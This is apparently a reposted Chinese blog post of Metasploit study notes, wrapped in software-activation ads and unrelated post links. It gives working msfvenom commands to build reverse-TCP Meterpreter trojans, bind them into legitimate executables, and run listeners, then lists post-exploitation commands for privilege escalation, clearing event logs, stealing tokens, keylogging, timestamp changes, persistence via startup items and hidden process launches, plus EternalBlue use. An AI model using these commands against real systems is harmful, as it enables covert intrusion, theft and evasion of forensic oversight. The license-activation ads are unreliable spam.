msfconsole学习

msfconsole学习工具:Quasar-winAhMyth-andriod

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

工具:

        Quasar-win:

        AhMyth-andriod:

msfconsole启动:

        msfconsole

        msfconsole -q :无启动状态显示

一、MSF生成木马并连接

        使用攻击模块:use exploit/multi/handler

        指令:show options – 查看需要填写的参数和参数填写状态      

Name Current Setting Required Description
LHOST yes The listen address (an interface may be specified)
 LPORT 4444 yes The listen port

        设置LHOST和LPORT: set LHOST 本地ip LPORT 本地启用端口

        查看payload:show payloads

        设置payload:set payload windows/meterpreter/reverse_tcp

木马生成:

        使用msfvenom

        msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 -o ./meter_re_tcp_x86.exe LHOST=本地ip LPORT=本地端口

         msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -a x64 -o ./meter_re_tcp_x64.exe LHOST=本地ip LPORT=本地端口

运行监听:

        先进入使用模块

        run

        exploit


二、MSF木马VBS配置

windows-vbs:

        vbs:源码型脚本

        使用msfvenom

        msfvenom -p windows/meterpreter/reverse_tcp -f vbs -a x86 -o ./meter_re_tcp_x86.exe LHOST=本地ip LPORT=本地端口

msfconsole -r file        (文件中写相关命令,msfmu 会自动读取文件并执行)


三、MSF木马捆绑

        将木马捆绑到正常文件当中

        msfvenom -p windows/meterpreter/reverse_tcp -f exe -x ./test.exe -a x86 –platform windows -o ./kunbang.exe LHOST=连接ip LPORT=4444

        注意:找一个有效的可执行文件

木马混淆

        


Meterpreter

一、概述

        用于木马管理(操作电脑,功能完全)

二、操作

        1. 连接之后,屏幕实时显示:screenshare

        2.操作控制:ls查看文件

        3.上传下载:download 文件名   

#文件操作:

        linux文件命令操作方式

        文件路径:本机:getlwd        远程:getwd

        下载文件:download 文件名     

        上传文件:upload

        编辑:edit 文件名

        搜索文件:search 文件名

        查看挂载硬盘:show_mount

        hash查看:checksum

#系统操作

编号 描述 命令
1 提权 getsystem
2 清除事件日志 clearev
3 获取环境变量 getenv
4 获取pid getpid

Command       Description
    ——-       ———–
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine提权恢复
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

#网络操作

 Command       Description
    ——-       ———–
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service端口转发
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table

端口转发:       

#其他操作

交互命令

        键盘、鼠标操作和记录;关闭键盘、鼠标事件

        修改时间戳

三、MSF链接多个木马

        set exitonsession false        #可以连接多个session,默认true

        run -j        #后台监听

        jobs        #查看监听

        jobs -p        关闭监听

        sessions -i id        #进行操作

        bg        #回退

        jobs -k        #关闭监听                                        

四、MSF木马持久化

        show advanced        #高级指令

        run persistence  -参数        #设置持久化

meterpreter> run  persistence -参数

        重新生成一个木马(vbs)放入启动项

五、MSF进程迁移

        execute:

        eg:execute -f notepad

        学习参数

        execute -f cmd -i进行交互 -H隐藏启动

        

        execute -f /home/kali/Desktop/cmd.exe -m -d notepad        #傀儡进程

六、MSF漏洞扫描

       查找漏洞-使用此攻击模块-进行设置-进行检测-进行攻击

        show target 设置攻击目标

        back回退到msf6>

        ?/help        #查看命令

        search 漏洞名称        #搜索漏洞

        check        #检测该主机是否由此漏洞

        eg:使用永恒之蓝进行攻击测试:代号:ms17_010_eternalblue

七、MSF漏洞扫描内网穿透   

        公网连接内网需要进行内网穿透

        端口转发            

八、MSF-Stager&Stage

        payload三种方式:

                single

                Stager Stage

        windows/(x64)/stage/stager

eg:windows/x64/meterpreter/reverse_tcp     meterpreter:stage  reverse_tcp:stager

攻击成功:先发送stage放入到对方电脑-只有连接作用

分类:

        返回stage使用stager的连接方式 

九、exploit小结    

        根据情况选择攻击模块并使用

        根据情况选择payload并使用

        查看选项:show options

        查看高级:show advanced

        设置参数:set

        检测能否攻击 

        运行进行攻击

        使用handler进行便捷监听


MSF-Linux攻击

msf6>use payload/linux/x64/meterpreter/reverse_tcp

进行设置

generate -f 文件格式 -o 输出路径        #生成木马

handler -H 连接ip -P 连接端口 -n 名字 -p payload 

        


MSF-Mac攻击

OSX

和linux一样


MSF-Andriod&IOS攻击


 MSF-生成跨平台木马

生成源码

        可以跨平台执行的编程语言源码或执行文件

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/196294.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • C语言课程设计——学生成绩管理系统(详细报告)

    C语言课程设计——学生成绩管理系统(详细报告)欢迎来到「发奋的小魏」的博客。我是小魏,一名普通的在校大学生。在学习之余,用博客来记录我学习过程中的点点滴滴,也希望我的博客能够更给同样热爱学习热爱技术的你们带来收获!希望大家多多关照,我们一起成长一起进步。也希望大家多多支持我鸭,喜欢我就给我一个关注吧!目录1.用户分析 21.1用户需求 21.2用户目的 21.3验收 22.概要设计 22.1功能设计 22.2数据结构设计 32.3功能运行流程图 33.系统功能设计 43.1菜单选择模块的流程图 43.2添加模块的流程图 43

  • 基于flask框架的高校舆情分析系统[通俗易懂]

    基于flask框架的高校舆情分析系统[通俗易懂]系统分析:高校舆情分析拟实现如下功能,采集微博、贴吧、学校官网的舆情信息,对这些舆情进行数据分析、情感分析,提取关键词,生成词云分析,情感分析图,实时监测舆情动态。系统设计:前端:采用layui+echarts实现图表的展示,数据分析的结果后端:采用requests实现数据的采集,利用flask+mysql搭建web网站框架,利用机器学习的中文分词、情感分析等技术生成词云分析、关键词提取、情感分析等功能系统难点:采集微博、贴吧的数据,利用机器学习的知识生成词云分析、情感分析系统实现如

  • 开关三极管的导通和截止条件「建议收藏」

    开关三极管的导通和截止条件「建议收藏」转自:https://blog.csdn.net/ruanjianruanjianruan/article/details/38523973三极管在我们数字电路和模拟电路中都有大量的应用,在我们开发板上也用了多个三极管。在我们板子上的LED小灯部分,就有这个三极管的应用了,图3-5的LED电路中的Q16就是一个PNP型的三极管。图3-5 LED电路三极管的初步认识三极管是一…

  • 地理加权回归模型案例_地理加权回归不能用哑变量

    地理加权回归模型案例_地理加权回归不能用哑变量目前,GWR已经成为处理空间异质性的主要方法之一。与经典的全局回归模型的OLS不同,GWR是局部回归模型,模型系数是通过观测周围的样本来回归得到。在这里插入图片描述

  • linux下DNS配置及域名解析服务

    linux下DNS配置及域名解析服务一.DNS(DomainNameSystem,域名系统)    因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。    DNS服务器将域名解析出来,找到域名对应的ip地址的…

  • dwcss样式中英对照_dw-cs5-css规则英汉对照表.docx

    dwcss样式中英对照_dw-cs5-css规则英汉对照表.docxdw-cs5-css规则英汉对照表.docx一、类型FONTFAMILY字体FONTSIZE字体大小FONTSTYLE字体风格,如斜体、正常等LINEHEIGHT行高(用来设定字行间距)FONTWEIGHT字体浓淡FONTVARIANT字体变量(用来设定字体是正常显示,还是以小型大写字母显示)TEXTTRANS文本转换(用来设定字体的大小写转换)TEXTDECORATION(字体装饰)UNDER…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号